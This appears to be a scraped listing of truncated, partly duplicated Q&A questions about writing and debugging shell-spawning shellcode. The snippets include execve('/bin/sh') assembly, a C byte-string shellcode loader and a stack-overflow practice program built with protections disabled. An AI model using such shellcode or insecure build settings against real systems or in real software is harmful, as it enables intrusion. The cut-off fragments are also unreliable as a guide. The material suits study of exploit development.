shellcode

问题 I'm following a basic shell-spawning exploit example. Below is exactly what my book tells me to write, yet I still get a segfault. When running this in gdb, I get a segfault at "mov byte [esi + 7], al". This line is necessary so that I can put a null byte at the end of my string "/bin/sh". When I flipped it around to "mov byte al, [esi + 7]", this did not cause a segfault. I'm assuming that I do not have write permissions to the place in memory where my string is stored. It seems I only have

问题 I'm following a basic shell-spawning exploit example. Below is exactly what my book tells me to write, yet I still get a segfault. When running this in gdb, I get a segfault at "mov byte [esi + 7], al". This line is necessary so that I can put a null byte at the end of my string "/bin/sh". When I flipped it around to "mov byte al, [esi + 7]", this did not cause a segfault. I'm assuming that I do not have write permissions to the place in memory where my string is stored. It seems I only have

问题 I'm trying to run this shellcode but I keep getting segmentation fault /* call_shellcode.c */ /*A program that creates a file containing code for launching shell*/ #include <stdlib.h> #include <stdio.h> #include <string.h> const char code[] = "\x31\xc0" /* Line 1: xorl %eax,%eax */ "\x50" /* Line 2: pushl %eax */ "\x68""//sh" /* Line 3: pushl $0x68732f2f */ "\x68""/bin" /* Line 4: pushl $0x6e69622f */ "\x89\xe3" /* Line 5: movl %esp,%ebx */ "\x50" /* Line 6: pushl %eax */ "\x53" /* Line 7:

问题 I'm trying to run this shellcode but I keep getting segmentation fault /* call_shellcode.c */ /*A program that creates a file containing code for launching shell*/ #include <stdlib.h> #include <stdio.h> #include <string.h> const char code[] = "\x31\xc0" /* Line 1: xorl %eax,%eax */ "\x50" /* Line 2: pushl %eax */ "\x68""//sh" /* Line 3: pushl $0x68732f2f */ "\x68""/bin" /* Line 4: pushl $0x6e69622f */ "\x89\xe3" /* Line 5: movl %esp,%ebx */ "\x50" /* Line 6: pushl %eax */ "\x53" /* Line 7:

问题 I'm on MAC OSX and I'm trying to call through assembly the execve syscall.. His opcode is 59 . In linux I have to set opcode into eax, then parameters into the others registers, but here I have to put the opcode into eax and push parameters into the stack from right to left. So I need execve("/bin/sh",NULL,NULL), I found somewhere that with assembly null=0, so I put null into 2nd and 3rd parameters. global start section .text start: jmp string main: ; 59 opcode ; int execve(char *fname, char

问题 I'm trying to write kind of exploit and have a problem with making my asm code run anywhere on the stack. Here's it: BITS 64 global _start _start: mov rax, 59 jmp short file c1: pop rdi jmp short argv c2: pop rsi mov rdx, 0 syscall ret file: call c1 db '/bin/sh',0 argv: call c2 dq arg, 0 <- problem arg: db 'sh',0 This code won't work anywhere on the stack due to selected line because this code can be executed anywhere on the stack so nasm can't correctly compute arg's address. (This is a

问题 I'm learning to write a simple shell code using assembly. I get a Segment fault when the mov opcode executes to write over the db data. Why? Any guidance appreciated! Debugging with gdb confirms the data is contiguous with the code at run time and readelf analysis of the program confirms the data segment is writeable. section .text global _start _start: ; The following code calls execve("/bin/sh", argv, envp=0) jmp short two one: pop ebx xor eax, eax mov [ebx+12], eax mov [ebx+7], al mov [ebx

问题 My code: .section .data name: .string "/bin/sh" args: .string "-c" .string "ls" .section .text .globl _start _start: pushq $0 pushq name movq $59, %rax movq %rsp, %rdi pushq $0 pushq args movq %rsp, %rsi movq $0, %rdx syscall I know that the second argument of execve is array of chars. How to do this in assembly avoiding this: execve("./payload", ["./payload"], 0x7ffc291fd160 /* 40 vars */) = 0 execve("/bin/sh", [0x736c00632d], NULL) = -1 EFAULT (Bad address) --- SIGSEGV {si_signo=SIGSEGV, si

问题 Trying to learn more about exploit dev and building shellcodes, but ran into an issue I don't understand the reason behind. Why am I not able to run a shellcode such as execve("/bin/sh") and spawn a shell I can interact with? While on the other hand, I'm able to create a reverse / bind_tcp shell and connect to it with netcat. Sample program: // gcc vuln.c -o vuln -m32 -fno-stack-protector -z execstack #include <stdio.h> #include <string.h> void test() { char pass[50]; printf("Password: ");

问题 A prior related question was answered. Thank you! However this creates a new question for me. Why does nasm put data bytes at two different memory locations? I include program information and other data dump below. ---------- code snippet compiled with nasm, ld ----------------- section .text ... zero: jmp short two one: pop ebx xor eax, eax mov [ebx+12], eax mov [ebx+8], ebx mov [ebx+7], al lea ecx, [ebx+8] lea edx, [ebx+12] mov al, 11 int 0x80 two: call one section .data align=1 msg: db '